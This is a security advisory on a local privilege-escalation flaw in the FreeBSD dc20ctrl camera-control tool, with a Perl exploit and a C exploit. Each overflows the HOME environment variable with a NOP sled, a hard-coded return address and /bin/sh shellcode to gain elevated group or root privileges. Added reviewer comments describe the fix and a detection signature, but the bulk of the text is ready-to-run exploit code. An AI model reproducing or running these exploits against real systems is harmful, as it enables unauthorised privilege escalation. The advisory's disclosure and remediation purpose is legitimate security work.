DC20ctrl allows an administrator to control a Kodak DC20 digital camera over the serial port. A security vulnerability in the product allows a local user to gain elevated privileges.
Credit:
The information has been provided by dethy. The C exploit code was written by Mray.
The exploit code below can be used to test for this vulnerability.
Exploit:
#!/usr/bin/perl
# FreeBSD 3.x/4.X dc20ctrl local exploit
# should yield gid(dialer) or gid(root) on non-fbsd systems.
#
# vulnerability lies in session.c in getenv(), other bugs
# exist, such as the -P with 344 byte arg, overwriting %ecx.
# To get $ret do: export HOME=`perl -e 'print "A"x520'`; dc20ctrl;
# gdb dc20ctrl -c dc20ctrl.core ; in gdb type: info reg $esp
#
# code by dethy - Feb 10 2001.
# dethy@synnergy.net / www.synnergy.net
#
# Reviewer notes (defensive reading):
# The whole trigger is one environment variable.  Per the header above,
# dc20ctrl reads HOME via getenv() in session.c and copies it into a
# fixed-size buffer without checking its length; the 520-byte crash recipe
# and the `info reg $esp` step indicate a stack buffer whose saved return
# address is reached (presumably — not verified here).  The application-side
# fix is to bound that copy to the destination size and to treat every
# environment value as untrusted input of arbitrary length; a setgid binary
# should also drop its group privileges before touching user-controlled data.
# For detection, the observable is a setgid process started with an HOME of
# well over a kilobyte consisting of repeated 4-byte values and 0x90 bytes.
#
# Raw i386 payload.  It contains the literal "/bin/sh"; presumably an
# execve-style payload, but its behaviour is not analysed here.
$shellcode = "\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76".
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b".
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff".
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff".
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02".
"\x02\x02\x02/bin/sh.-c.sh";
# Hard-coded stack address for one specific release; any other build or
# environment layout makes this value wrong (hence the env clearing below).
$ret = 0xbfbff79c; # FreeBSD 4.2
# Number of bytes of repeated $ret at the front of HOME (matches the 520-byte
# crash input in the header).
$buf = 520;
# Size budget for the NOP sled + shellcode that follows; 100 bytes are held back.
$egg = 1000;
$nop = "\x90";
print "\nFreeBSD dc20ctrl local exploit by dethy\n\n";
# Empty the environment so that only HOME is passed to the child; the
# author's remark is that this keeps the stack layout (and therefore $ret)
# predictable.
foreach $key (keys %ENV) {
delete $ENV{$key}; # avoid offset guessing
}
# 'l' = native signed long, 4 bytes little-endian on i386.
$addr = pack('l', $ret);
# $buf/4 copies of the address, then NOPs, then the payload.
for ($i = 0; $i < $buf; $i += 4) { $buffer .= $addr; }
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}
$buffer .= $shellcode;
# HOME is the only variable the child inherits.
$ENV{'HOME'} = $buffer;
# exec LIST form.  Note the leading "./": the path is resolved relative to the
# current working directory, not as the absolute install path.
exec("./usr/local/bin/dc20ctrl", 0);
Additional Exploit Code:
The following is similar exploit code in C:
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
/* Total length of the HOME value built in main(); the same 520 bytes the
 * Perl version above uses for its address block. */
#define BSIZE 520
/* Hard-coded stack address the overwritten return pointer is aimed at.
 * Differs from the Perl script's value; it is specific to one build/layout
 * and is adjusted at runtime by argv[1]. */
#define EIP 0xbfbfdcb8
#define NOP 0x90
#define PATH "/usr/local/bin/dc20ctrl"
/* Raw i386 payload.  Contains the literal "/bin/sh"; presumably an
 * execve-style payload, not analysed here.  Note the trailing bytes are part
 * of the payload, not padding. */
char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07"
"\x89\x56\x0f\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b"
"\x8d\x4e\x0b\x89\xca\x52\x51\x53\x50\xeb\x18\xe8\xd8"
"\xff\xff\xff/bin/sh\x01\x01\x01\x01\x02\x02\x02\x02"
"\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
/*
 * Builds a BSIZE-byte HOME value laid out as
 *     [NOP sled][shellcode][4-byte address]
 * sets it in the environment and exec()s dc20ctrl.  argv[1], if given, is an
 * integer subtracted from EIP.
 *
 * Reviewer notes (defensive reading): the entire trigger is an overlong
 * environment variable consumed by a setgid program through getenv()
 * (session.c, per the Perl header on this page).  The fix belongs in the
 * target: bound the copy to the destination size, treat environment values
 * as untrusted input of arbitrary length, and drop privileges before
 * handling them.  The code below is i386/32-bit specific in several places,
 * noted inline.
 */
int main(int argc, char *argv[]) {
char *buf = NULL, *p = NULL;
long *addressp = NULL, address=EIP;
int offset=0,i=0;
/* atoi() reports no errors: unparsable input silently becomes offset 0. */
if(argc > 1){
offset = atoi(argv[1]);
}
address -= offset;
if (!(buf = (char *)malloc(BSIZE))) {
printf("error malloc()\n");
exit(-1);
}
p = buf;
addressp = (long *) p;
/* Fill the whole buffer with copies of the address.  Assumes sizeof(long)
 * == 4: with an 8-byte long the loop stores 2*BSIZE bytes into a BSIZE-byte
 * allocation. */
for (i = 0; i < BSIZE; i+=4) {
*(addressp++) = address;
}
/* Overwrite the front with NOPs, leaving room for the shellcode plus the
 * final 4-byte address.  strlen() is used without <string.h>, so it is
 * implicitly declared (pre-C99 behaviour). */
for (i = 0; i < (BSIZE - strlen(shellcode) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BSIZE - strlen(shellcode) - 4);
for (i = 0; i < strlen(shellcode); i++) {
*(p++) = shellcode[i];
}
/* Off-by-one: index BSIZE is one past the end of the BSIZE-byte allocation. */
buf[BSIZE] = '\0';
printf("ADDRESS 0x%lx OFFSET %d\n", address,offset);
/* The overlong HOME is the only thing the child needs to see. */
setenv("HOME", buf, 1);
/* The variadic list ends in a plain 0 rather than (char *)NULL, which is
 * only safe where int and pointer have the same width.  Nothing follows the
 * exec: if it fails, main falls off the end without reporting it. */
execlp(PATH, "dc20ctrl","-P","alien88izretarded", 0);
}